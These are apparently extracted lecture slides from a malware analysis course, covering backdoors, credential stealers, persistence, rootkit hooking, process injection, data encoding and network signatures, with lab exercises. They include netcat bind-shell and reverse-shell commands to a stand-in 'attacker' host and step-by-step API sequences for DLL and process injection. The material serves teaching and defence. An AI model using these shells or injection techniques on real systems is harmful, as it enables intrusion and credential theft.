Transcript victim$ nc –l –p 8888

Part 4: Malware Functionality
Chapter 11: Malware Behavior
Chapter 12: Covert Malware Launching
Chapter 13: Data Encoding
Chapter 14: Malware-focused Network
Signatures
Chapter 11: Malware Behavior
Common functionality
1. Downloaders
2. Backdoors
3. Credential stealers
4. Persistence mechanisms
5. Privilege escalation
6. Covering tracks (rootkits)
1. Downloaders
Retrieve additional pieces of malware from
network to execute
Often packaged with an exploit
In Windows, API call URLDownloadtoFileA used to
download
Followed by call WinExec to execute
2. Backdoor
Malware that provides attacker with remote
access to victim machine
Most common type of malware
Commonly use outgoing port 80 (HTTP) to blend in
with other traffic
Commonly implement reverse shells
•
•
Allow attacker to execute commands as if they
were on local system
Examples: netcat, cmd.exe, remote
administration tools
netcat
On computer 1, execute program “echo hello”
and redirect output to local netcat server on
8888
victim$ echo hello | nc –l –p 8888
Connect to computer 1 at 8888 and redirect
output to file foo.txt
attacker$ nc victim 8888 >foo.txt
attacker$ cat foo.txt
hello
netcat
Backdoor shell listener
victim$ nc –l –p 8888 –e /bin/sh
Connecting to shell
attacker$ nc comp1 8888
Getting past firewalls and NAT
Connection
Attempt
Attacker
nc victim 8888
Firewall
Or
NAT
X
Victim
nc –l –p 8888 –e /bin/sh
netcat
Bypass firewalls and NAT by “shoveling a shell”
Make attacker run listener
Victim initiates outgoing connection (e.g. IRC, HTTP)
attacker$ nc -l -p 8888
victim$ nc attacker 8888 -e /bin/sh
Connection shovel
Firewall
Attacker
nc –l –p 8888
Victim
nc attacker 8888 –e /bin/sh
Windows reverse shells
cmd.exe equivalent to netcat
CreateProcess
Create a socket and connect it to server
Tie stdin, stdout, and stderr of process to socket
Multithreaded version can use CreateThread and
CreatePipe
Remote administration tools
Similar to botnet command and control
Victim beacons outside controller to receive
instructions
Example: Poison Ivy
3. Credential Stealers
3 main types
Programs that monitor user logins
Programs that dump credentials stored in Windows
(e.g. password hashes) that can be attacked off-line
Programs that log keystrokes
Monitoring User Login
Graphical Identification aNd Authentication
(GINA) for Windows Login
 Winlogon process started
 Winlogon invokes GINA library code (msgina.dll)
 GINA requests credentials
Example: GINA interception
FakeGINA sits between Winlogon and msgina.dll
(Figure 11-2)
Exploits mechanism intended to allow other means
of authentication
Configured to run by setting a Windows registry key
•
HKLM\SOFTWARE\...\Winlogon\GinaDLL
set to fsgina.dll
Winlogon process
winlogon executes
fakegina.dll requests credentials
fakegina.dll passes credentials to msgina.dll
Logout hooked to store credentials (Listing 11-1)
Dumping credentials
Password storage
Typically, only hashes of passwords stored
Users with forgotten passwords issued new ones
Hash function well-known
Dumping hashes allows dictionary attacks since
users with weak passowrds subject to brute-force
dictionary attacks off-line
Windows hashes
Security Account Manager (SAM)
Local Security Authority Subsystem Service
(LSASS)
Example: lsass dumping
Pwdump, Pass-the-Hash (PSH) toolkits
Pwdump performs DLL injection on lsass.exe (Local
Security Authority Subsystem Service)
Injects lsaext.dll
Uses GetHash call to extract hashes
•
•
Can be easily changed to avoid signatures
Listing 11-2 “GrabHash” variant
Logging keystrokes
Records keystrokes so attacker can observe
typed data
Kernel-based keyloggers
Built into keyboard drivers
User-space keyloggers
Use Windows API to hook I/O functions
(SetWindowsHookEx) or poll for state of keys
(GetForegroundWindow and GetAsyncKeyState)
Example polling keylogger: Listing 11-4
4. Persistence Mechanisms
Methods to ensure survival of malware on a
system
Windows Registry persistence
Trojaning
DLL load-order hijacking
Windows registry persistence
Common key malware targets
 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
+ dozens more
AppInit_DLLs
•
•
Loaded into every process that loads User32.dll
Stored in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Windows
•
Space delimited string of DLLs
Windows registry persistence
Common key malware targets
Winlogon
•
Hooking logged events (logon, logoff, startup,
shutdown, lock screen)
•
\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
•
When winlogon.exe generates an event,
Windows checks the Notify registry key above for
a DLL that will handle it
SvcHost DLLs
•
•
All services persist via registry
svchost.exe – generic host process for services
that run from DLLs
•
\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
•
\HKLM\System\CurrentControlSet\Services\ServiceName
Trojaning
Malware patches binary or library to add its
functionality
Example: Nimda, Bliss
Append code in existing section or in new section
Change entry point to point to virus code
Virus returns to target program after execution
Trojaning using the ELF header
typedef struct {
unsigned char e_ident[EI_NIDENT];
Elf32_Half e_type;
Elf32_Half e_machine;
Elf32_Word e_version;
Elf32_Addr e_entry;
Elf32_Off
e_phoff;
Elf32_Off
e_shoff;
“This member gives the virtual address
Elf32_Word e_flags;
to which the system first transfers
Elf32_Half e_ehsize;
control, thus starting the process”
Elf32_Half e_phentsize;
We can change this to point elsewhere
Elf32_Half e_phnum;
(not main() )
Elf32_Half e_shentsize;
Elf32_Half e_shnum;
Elf32_Half e_shstrndx;
} Elf32_Ehdr;
 interesting!
Trojaning DLLs
DllEntryPoint function tampering
Table 11-1
pusha to save all registers in one instruction
Look for popa to see return back to legitimate code
Listing 11-5
Trojaning DLLs
DLL load-order hijacking
DLL search path in Windows
•
•
•
•
•
•
Directory from which application was loaded
Current directory
System directory (GetSystemDirectory function)
16-bit system directory
Windows directory (GetWindowsDirectory
function)
Directories in PATH environment variable
Rename malicious library and place high in path
5. Privilege escalation
Most users run as local administrators
Malware uses privilege escalation for those that
don't
Exploit vulnerable code to obtain administrator
privileges
Many malware frameworks include such exploits
(e.g. http://www.metasploit.com/)
Access to restricted calls such as TerminateProcess
and CreateRemoteThread
Using SeDebugPrivilege
Modify security token of a process using
AdjustTokenPrivileges to obtain
Initially used as a tool for system-level debugging
Add SeDebugPrivilege to process (Listing 11-6)
6. Covering tracks – rootkits
Hide malicious activity
Make malicious files, processes, network
connections, and other resources invisible
Most rootkits are kernel-mode to run at the same
level as anti-virus/anti-malware
Function hooking
Mechanism used to redirect function calls to
injected attack code
Replaces legitimate function with alternative one
Two general methods
Function table hooking
Run-time data structures that contain function pointers
that are invoked during program execution
Hot patching function invocation (inline hooking)
Modify JMP/CALL targets
Modify function prologues to add detour to trampoline
IAT hooking
Import Address Table (IAT) used to call functions
in libraries
Application code
InternetConnect()
push <call parms>
call [imp_InternetConnect]
…
push ebp
lea ebp, [esp+var_5 8]
sub esp, 29Ch
…
…
Import Address Table
jmp InternetConnect
jmp InternetAutodial
jmp InternetErrorDlg
…
IAT hooking
Modify IAT to hijack a DLL call
 Makes a hack ‘portable’ to other applications
 Load rootkit hook function into memory
 Replace target function’s address in the IAT with address of hook function
 Figure 11-4
Application code
InternetConnect()
push <call parms>
call [imp_InternetConnect]
…
push ebp
lea ebp, [esp+var_5 8]
sub esp, 29Ch
…
…
Import Address Table
x
jmp InternetConnect
jmp InternetAutodial
jmp InternetErrorDlg
…
Rootkit Code
IAT hooking
Method
 Locate import section from IAT
 Find IMAGE_IMPORT_DESCRIPTOR chunk of DLL that exports that
function
 Locate IMAGE_THUNK_DATA which holds original address of imported
function
 Replace address in IAT to point to your function and have your function
eventually call the original
Detection problems
 Legitimate hooking common
 Methods such as DLL forwarding makes benign vs. malicious hooks hard to
discern
 Late binding
 Applications do late-demand binding where function addresses are not
resolved until called
 Reduces amount of memory used
 But, won’t know what the legitimate values should be!
Example library hooks
Processes rely on APIs provided by above
DLLs loaded at runtime into process address space
 Kernel32.dll, User32.dll, Gui32.dll, Advapi.dll
 Kernel32 loaded into private address space between 0x00010000
and 0x7FFE0000
Example: Hiding files in a directory
 Replace FindFirstFile(), FindNextFile() in Kernel32 to skip rootkit files
Other DLLs
DirectX/OpenGL APIs and time functions
 Typically hooked to implement cheating in on-line games
Winsock API
 Hooked to monitor network traffic
Example library hook
Hook keyboard/DirectInput APIs to obtain
keyboard/mouse events
GetKeyboardState(), GetKeyState(),
GetDeviceState(), etc.
SHORT WINAPI FakeGetAsyncKeyState(int vKey)
{
SHORT nResult = 0;
if (g_bNeedMP) {
if (vKey == VK_M) {
nResult |= 0x8000; //’M’ pressed
g_bNeedMP = FALSE;
}
}
else
nResult = RealGetAsyncKeyState(vKey);
//...
return nResult;
}
Detours
Library developed by Microsoft in 1999
 Instrument and extend existing OS and application functionality simply
• G. Hunt, D. Brubacker, “Detours: Binary Interception of
Win32 Functions”, 3rd USENIX Windows NT Symposium,
July 1999.
•
A programmer-friendly “feature” of Windows to easily
patch functions
 Call hooks modify tables and can be detected by anti-virus/anti-rootkit
technology
• Detours modify function in-line
 Malware uses to extend application with malicious functions
• Commonly used to add malicious DLLs into existing
binaries on disk
•
Adds a new .detour section into PE structure and modifies
import address table using setdll tool in Detours library
•
Targets include authentication check, DRM checks, antivirus code, file system scans
Detour mechanism
Detour and Trampoline
Redirect function calls inline
Save initial instructions of function at the entry point
• Original bytes of function saved in trampoline
Inject code (detour) to redirect execution to interceptor
function (trampoline)
• Insert jump instruction into function directly
Trampoline
• Implements 5 replaced bytes of original
function
• Implements the function you want to execute
• jmps back to original target function plus 5
Detour details
Replace function preamble with a 5-byte unconditional jmp
 Implement replaced instructions in trampoline code
 Before XP
 55 push ebp
 8bec mov ebp, esp
 Hard to hook since you must disassemble user code
 After XP





8bff mov edi, edi
55 push ebp
8bec mov ebp, esp
Easy to hook, exactly 5 bytes
MSFT intentionally did this to make hot patches easy
More powerful than IAT hooking
 Do not have problems with binding time
 No matter how the function is called, your code will run
 Functions appearing in multiple tables are handled in one step
 Can be used for both kernel and user functions
Detours
Overwriting important code
Must know which OS is being used
Must also ensure no one else has tampered or patched
the function already
Must save the instructions being removed by detour
Patching addresses
Relative FAR JMP instruction target calculated at run-time
Need to patch this with desired offset at run-time
FAR JMP
Rootkit code
Rest of original function
Removed instructions
FAR JMP
Detour example
Modify ZwDeviceIoControlFile to hide ports
Listing 11-7: Get pointer to code location of function
to insert hook into eax
Table 11-2: Define “hook byte” template (detour)
Copy address of hooking function into template
(memcpy)
Listing 11-8: Call to install hook bytes into
ZwDeviceIoControlFile call
Hook bytes can be installed deep into function to
avoid detection
Rootkit functions
Disable or modify anti-virus process
Disable software updates
Disable periodic “rehooking” code
Modify network operations and services
Modify boot loader
 Have boot loader apply patches to kernel before loading
Modify on-disk kernel
 Modify boot loader to allow new kernel to pass integrity
check
Registering as a driver or boot service
 Load on boot via run key in registry
 Must hide key from anti-virus after being loaded
In-class exercise
 Lab 11-1
–
Use strings to identify potential target of malware
–
Generate Figure 11-1L (Show TGAD section)
–
Show Resource Hacker extracting TGAD
–
In IDA Pro, show the routine that performs the
extraction
–
Generate Listing 11-2L in the extracted DLL
–
Show Listing 11-3L and explain why a jmp is used
–
Show Listing 11-4L and explain why a call is used
–
Show Listing 11-5L and explain the purpose of
msutil32.sys
Chapter 12: Covert Malware Launching
Covert Launching Methods
Launchers
Process Injection
Process Replacement
Hook Injection
Detours
APC Injection
1. Launchers
Malware that sets itself up for immediate or future covert
execution
 Often contain malware that is to be executed in a resource
section
 See previous Lab 11-01
 Uses FindResource, LoadResource, and SizeofResource
API calls to extract
2. Process Injection
Inject code into another running process
 Bypasses host-based firewalls and process-specific security
mechanisms
 Force process to call VirtualAllocEx, then
WriteProcessMemory to inject code
 Two injection types: DLL injection, direct injection
DLL injection
Force remote process to load a malicious DLL
 Most common covert loading technique
 Remotely inject code into process that calls LoadLibrary
 OS automatically executes DllMain of newly loaded libraries
 All actions appear to originate from compromised process
 Figure 12-1
DLL injection into running process
DLL injection
Method #1
 CreateToolhelp32Snapshot, Process32First, Process32Next API calls to
search the process list for victim process
 Get PID of victim and use OpenProcess to obtain handle
 Allocate space for name of malicious DLL in victim process
• VirtualAllocEx allocates space in remote process if handle
provided
 Call WriteProcessMemory to write string into victim process where
VirtualAllocEx obtained space
 Call CreateRemoteThread to start a new thread in victim
• lpStartAddress : starting address of thread (set to address
of LoadLibrary)
•
lpParameter : argument for thread (point to above memory
that stores name of malicious DLL
•
Listing 12-1, Figure 12-2
J. Richter, “Load Your 32-bit DLL into Another Process’s
Address Space Using INJLIB”, Microsoft Systems Journal/9 No. 5
DLL injection
Method #2
 Allocate space in the victim process for code to inject DLL
 Write DLL injection code into the memory space of the victim
 Create or hijack a thread in the victim to run/load the DLL
 Clean up tracks
Preserving original functionality
 Still need original functions to work correctly
 Injected DLL often set up to call original DLL to support desired functionality
 Interposed between application and real DLL
Example tool
 Inject.exe (Aphex)
 C:\> inject.exe winlogon “myrootkit.dll”
DLL injection
Method #2 using Windows Debug API
Attacker must have Debug programs rights on system
Get debugger attached to process and run
 Break when you want to inject
 Obtain code to inject/load a DLL into memory space
 Analyze PE header to find a usable, writable part of memory for code
•
ReadProcessMemory to save what is there
•
WriteProcessMemory to write injection code
•
Include INT 3 at end of injection code for debugger to stop
•
Set EIP to start of code to inject a DLL and continue
•
Breaks when DLL loaded, restore original state of memory (i.e.
remove code to inject DLL)
Even easier with a code cave (no need to save memory) to process and run
Code cave example
Code cave
Communications
Technology Lab
Direct injection
Similar to DLL injection, but write all code into victim process
directly
 No DLL
 Requires custom code that will not disrupt victim process
 Often used to inject shellcode
Mechanism
 Use VirtualAllocEx, WriteProcessMemory to write data used
for subsequent call to CreateRemoteThread
 Use VirtualAllocEx and WriteProcessMemory again to
allocate space for remote thread code
 Use CreateRemoteThread to execute
3. Process replacement
Overwrite memory space of running process with malicious executable
 Disguise malware without risking crashes from partial injection
 Example: svchost.exe
• Start svchost in suspended state
•
Pass CREATE_SUSPENDED as the dwCreationFlags
parameter when calling CreateProcess (Listing 12-2, 123)
•
Release all memory using ZwUnmapViewOfSection
•
Allocate memory for malicious code via VirtualAllocEx
•
WriteProcessMemory to write malware sections
•
SetThreadContext to fix entry point to point to malicious
code
•
ResumeThread to initiate malware
•
Bypasses firewalls and intrusion prevention systems since
svchost runs many network daemons
4. Hook Injection
Interpose malware using Windows hooks
 Hooks used to handle messages and events going to/from
applications and operating system
 Use malicious hooks to run certain code whenever a
particular message is intercepted (i.e. keystrokes)
 Use malicious hooks to ensure a particular DLL is loaded in
a victim's memory space (i.e. process loaded event)
Types of hooks
 Local hooks: observe and manipulate messages internally
within process
 Remote hooks: observe and manipulate messages destined
for a remote process
Example hooks
Keyboard hooks
 Registering hook code using WH_KEYBOARD or
WH_KEYBOARD_LL hook procedure types to implement
keyloggers
Windows hooks
 Register hook with SetWindowsHookEx to capture window
events
Targeting threads
 Hooks must determine which thread to attach to
 Malware must include code to get dwThreadId of victim
 Search process listing to find
 Intrusion Prevention Systems look for suspicious hooks
 Listing 12-4
5. Detours
See previous chapter
 Figure 12-4
Detours
Example: MigBot
Detours two kernel functions: NtDeviceIoControlFile
and SeAccessCheck
Both are exported and have entries in the PE
header
APC injection
APC = Asynchronous Procedure Call
 CreateRemoteThread requires overhead
 More efficient to invoke function on an existing thread
 Each thread has an APC function queue attached to it
 Threads execute all functions in APC queue when in an
alertable state (i.e. swapped out)
• e.g. after calls to WaitForSingleObjectEx,
WaitForMultipleObjectsEx, and SleepEx
 Malware performs APC injection to preempt threads in an
alertable state to get immediate execution of their code
Two forms
 Kernel-mode: APC generated for the system or a driver
 User-mode: APC generated for an application
APC injection from user space
One thread can queue a function to be invoked in another via
API call QueueUserAPC
 WaitForSingleObjectEx is the most common call to the
Windows API
 Listing 12-5: OpenThread followed by QueueUserAPC using
LoadLibraryA on a malicious DLL (dbnet.dll)
• Note: calls to CreateToolhelp32Snapshot or
ZwQuerySystemInformation, Process32First,
Process32Next, Thread32First, and
Thread32Next usually precede this snippet
APC injection from kernel space
Malicious drivers in kernel often would like to execute code in
user space
 Listing 12-6: kernel code to inject an APC into user space
In-class exercise
Lab 12-1
 Show the imports and strings

Rename the three imports (see Listing 12-1L)

Generate Listing 12-2L and explain what its
function is

Explain how Listing 12-4L uses what is performed
in Listing 12-3L

Use ProcessExplorer to show injection for Figure
12-1L

Generate Listing 12-5L and explain the parameters
In-class exercise
Lab 12-3
 Show the imports that indicate the program's
function

Generate Listing 12-14L and explain what “fn” is

Navigate fn to generate Listing 12-15L

Follow the function called after a “KEYDOWN”
event. What does the code in Listing 12-16L do?
Chapter 13: Data Encoding
Data Encoding
Goal
 Defeat signature-detection by obfuscating malicious content
• Encrypt network communication
• Hide command and control location
• Hide staging file before transmission
• Hide from “strings” analysis
Methods
 Simple Ciphers
 Common Cryptographic Algorithms
 Custom Encoding
 Decoding
Simple Ciphers
Caesar Cipher
 Shift/Rotate characters
XOR
 Bit-wise XOR of data with a fixed byte or generated byte
stream
 Figure 13-1
 For a fixed byte XOR, can brute force all 256 values to find a
header that makes sense (Table 13-1, Listing 13-2)
 Some malware uses null-preserving XOR to make detection
less obvious
 Decoding loops easy to identify via searching for xor opcode
• Figure 13-2
Simple Ciphers
Base-64
 Represents binary data in an ASCII string format
 From MIME standard,
 Binary data converted into one of 64 primary characters
• [a-zA-Z0-9+/], = used for padding
• Every 3-bytes of binary data is encoded in 4bytes of Base64 (Figure 13-4)
0
0
10
20
30
40
50
60
 Example:
•
•
1
A
K
U
e
o
y
8
2
B
L
V
f
p
z
9
3
C
M
W
g
q
0
+
4
D
N
X
h
r
1
/
5
E
O
Y
i
s
2
6
F
P
Z
j
t
3
7
G
Q
a
k
u
4
8
H
R
b
l
v
5
9
I
S
c
m
w
6
J
T
d
n
x
7
3 byte binary =01001101 01100001 01101110
4 byte Base64 = 010011 010110 000101 101110
– TWFu
Simple Ciphers
Base-64 decoding
 Look for a string used as an index table
• ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg
hijklmnopqrstuvwxyz0123456789+/
 Try on-line conversion tools
• www.opinionatedgeek.com/dotnet/tools/base64d
ecode
 Caution: Malware can easily modify index table to create
custom substitution ciphers very easily (see book example)
Common Cryptographic Algorithms
Use cryptographic ciphers to obfuscate strings
Drawbacks
 Crypto libraries are large and easily detected
 Must hide the key for symmetric encryption algorithms
Recognizing encrypted code
 Imports include well-known OpenSSL or Microsoft functions
(Figure 13-9)
 Use of cryptographic constants (Figure 13-10)
• FindCrypt2 plugin in IDA Pro
• Krypto ANALyzer plugin for PEiD
 Some malware employs crypto algorithms that do not have
constants (RC4, IDEA generate at run-time)
• Must search for high-entropy content (Figure 1313)
Common Cryptographic Algorithms
Use cryptographic ciphers to obfuscate strings
Drawbacks
 Crypto libraries are large and easily detected
 Must hide the key for symmetric encryption algorithms
Recognizing encrypted code
 Imports include well-known OpenSSL or Microsoft functions
(Figure 13-9)
 Use of cryptographic constants (Figure 13-10)
• FindCrypt2 plugin in IDA Pro
• Krypto ANALyzer plugin for PEiD
 Some malware employs crypto algorithms that do not have
constants (RC4, IDEA generate at run-time)
• Must search for high-entropy content (Figure 1313)
Custom Encoding
Hints
 Trace execution to see suspicious activity in a tight loop
 Example: pseudo-random number generation followed by
xor (Figure 13-14, 13-15)
Decoding
Self-decoding malware
 Malware packaged with decoding routine
 Tell-tale sign: strings that don't appear in binary file on disk,
but appear in debugger
 Decrypt by setting a breakpoint directly after decryption
routine finishes execution
Malware employing decoding functions
 Malware relies on system libraries to decode (i.e. Python's
base64.decodestring() or PyCrypto's functions)
 Listing 13-10
 OpenSSL calls
In-class exercise
Lab 13-1
 Show strings output
 Show web request listed in Listing 13-1L in Wireshark (turn off
promiscuous mode)
 In IDA Pro, search for all xor, then bring up Figure 13-1L, rename
xorEncode
 Bring up xrefs to xorEncode to get to Listing 13-2L
 Bring up binary in PEView to find resource section with type and name
listed in Listing 13-2L
 Install WinHex (winhex.com), open binary, and perform Figure 13-2L
 Install PEiD (softpedia.com) with caution (should be a Zip file), open
binary, and run KANAL at bottom right arrow to obtain Listing 13-3L
 Bring up Figure 13-3L in IDA Pro
 From xref to top-level function, bring up and rename base64index
function
 From xref to base64index, bring up Listing 13-4L
 What does the string in the URL being requested represent?
Chapter 14: Malware-Focused Network
Signatures
Networking and Malware
Network Countermeasures
Safely Investigating an Attacker Online
Content-Based Network Countermeasures
Combining Dynamic and Static Analysis Techniques
Understanding the Attacker's Perspective
Network Countermeasures
IP connectivity
 Restrict network access using routers and firewalls
DNS
 Reroute known malicious domains to an internal host
(sinkhole)
Content-filters
 Proxies, intrusion detection systems, an intrusion prevention
systems for intercepting web requests in order to detect or
prevent access
Network Countermeasures
Mine logs, alerts, and packet captures from forensic
information
 No risk of infection when performing post-mortem analysis
versus actively attempting to run malware
 Malware can be programmed to detect active analysis
Indications of malicious activity
 Beacons to malicious sites, especially if done without DNS
query
OPSEC: Operations Security
 Take preventative measures to guard against
• Malware authors detecting you are on to them by
embedding one-time use name
• Malware authors capturing information about you
such as your home IP address or contacts
Safely Investigate an Attacker Online
Indirection
 Use network anonymizers such as Tor to hide yourself
 Use a virtual machine and virtual networks running through
remote infrastructure (cellular, Amazon EC2, etc)
IP address and DNS information
 See Regional Internet Registries to find out organizational
assignment of IP blocks
 Query whois records of DNS names to find contact
information metadata (domaintools.com)
Content-Based Network
Countermeasures
Intrusion Detection with Snort
 Rules that link together elements that must be true to fire
 Size of payload, flag fields, specific settings of TCP/IP
headers, HTTP headers, content in payload
 Table 14-1: Wefa7e's HTTP User-Agent
 p. 303 Snort rule to detect Wefa7e
 Variants of malware may tweak User-Agent
• Use regexps to modify rule
Combining Dynamic and Static
Analysis Techniques
Steganography in protocols
 Attackers mimicking typical web requests
 Encoding commands in URLs and HTTP headers
 Encoding commands in meta-data of web pages
Finding networking code to develop signatures
 WinSock API (WSAStartup, getaddrinfo, socket, connect,
send, recv, WSAGetLastError)
 WinINet API (InternetOpen, InternetConnect,
InternetOpenURL, InternetReadFile, InternetWriteFile,
HTTPOpenRequest, HTTPQueryInfo, HTTPSendRequest
 COM interface (URLDownloadToFile, CoInitialize,
CoCreateInstance, Navigate)
 Finding hard-coded patterns or stable content to create rules
 Reverse-engineering encoding or decoding scheme allows
for accurate network signature generation
Understanding the Attacker's
Perspective
Attackers will slightly change payloads to avoid detection
Strategies
 Focus on elements that are part of both endpoints
 Focus on elements of protocol known to be part of a key
(see above)
 Operate at a level that is different than other defenders (so
that an attacker side-stepping another filter will not affect
yours)
In-class exercise
Lab 14-1
 Run malware and capture the HTTP request it produces
shown in Listing 14-1L. Is it different?
 Find the networking API call this malware uses for its request
in IDA Pro
 Find where the URL string template is stored
 Generate Figure 14-1L
 Generate Figure 14-2L by redefining data location where
string is stored
 Locate where the two parts of the URL string are generated
(in the %s-%s sprintf)
 Map out how the character “6” is generated in the encoded
URL
 How could malware break the first Snort rule shown?